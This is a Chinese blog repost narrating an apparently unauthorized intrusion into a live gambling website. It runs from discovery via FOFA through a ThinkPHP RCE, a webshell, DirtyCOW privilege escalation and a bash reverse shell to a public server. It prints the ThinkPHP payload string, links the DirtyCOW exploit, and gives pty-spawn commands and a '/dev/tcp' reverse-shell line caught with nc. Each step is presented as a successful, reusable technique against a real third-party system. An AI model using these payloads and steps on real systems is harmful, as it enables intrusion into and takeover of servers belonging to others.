【渗透实例】记一次BC站从rce到提权

admin 2023年3月8日09:41:03评论67 views字数 1080阅读3分36秒阅读模式
免责声明
由于传播、利用本公众号听风安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号听风安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!


正文

前几天搜集了一下某湾资产发现一个bc平台,看起来像是有段时间了。

主页面全无入手点后,fofa查了一下ip开始挨个排查ip,8090端口打开没有啥服务但是一看这个图标就想到了thinkphp

【渗透实例】记一次BC站从rce到提权

【渗透实例】记一次BC站从rce到提权


云溪测了一下确定是tp和宝塔现在就有两个点可以进行探测,开始挨个排查thinkphp的历史漏洞。

利用工具进行探测的时候发现是存在这个漏洞的手工复习又不存在了


存在ThinkPHP 5.0.10 construct RCE?s=index%20Post:%20_method=__construct&method=get&filter[]=phpinfo&get[]=-1

【渗透实例】记一次BC站从rce到提权

上一个利用失败后幸好还有一个差不多的版本的rce可以尝试一下,利用成功写shell开始做内网。

【渗透实例】记一次BC站从rce到提权

开始信息收集,Linux系统,非root权限,ifconfig看了一下ip没有内网环境,也不用做横向其他的玩意。

【渗透实例】记一次BC站从rce到提权

尝试利用suid和sudo提权

sudo失败

【渗透实例】记一次BC站从rce到提权

suid也失败了

【渗透实例】记一次BC站从rce到提权

上传 LES对系统进行扫描后发现脏牛比较靠谱剩下的利用价值不大

【渗透实例】记一次BC站从rce到提权

下载c文件

https://github.com/FireFart/dirtycow

上传后进行编译运行

【渗透实例】记一次BC站从rce到提权

看一眼etc/passwd看一下有没有用户生成,成功生成

【渗透实例】记一次BC站从rce到提权

su切换账户失败了,终端类型不对,不能利用su

【渗透实例】记一次BC站从rce到提权

转化一下shell类型

python -c 'import pty; pty.spawn("/bin/sh")'python -c 'import pty; pty.spawn("/bin/bash")'


切换失败了,有人说可能是权限太小的问题, 我觉得可能不对,也可能是shell类型的原因

【渗透实例】记一次BC站从rce到提权

把shell反弹到公网服务器上

蚁剑使用bash反弹shell

bash -c 'exec bash -i &>/dev/tcp/1111111111111111/5555 <&1'

服务端nc接收shell

【渗透实例】记一次BC站从rce到提权

nc接收后查看权限依旧为www

【渗透实例】记一次BC站从rce到提权

使用 python -c 'import pty; pty.spawn("/bin/sh")' 会出现,这不是报错是正常的

【渗透实例】记一次BC站从rce到提权

然后政策切换账户成功 root权限

【渗透实例】记一次BC站从rce到提权

后面利用root权限进行信息收集的时候发现存在一个PHPunit其中也有一个rce上去就是root权限,手太快了搞这一圈

【渗透实例】记一次BC站从rce到提权




欢迎关注听风安全,分享更多安全技术~



原文始发于微信公众号(听风安全):【渗透实例】记一次BC站从rce到提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月8日09:41:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透实例】记一次BC站从rce到提权http://cn-sec.com/archives/1245205.html

发表评论

匿名网友 填写信息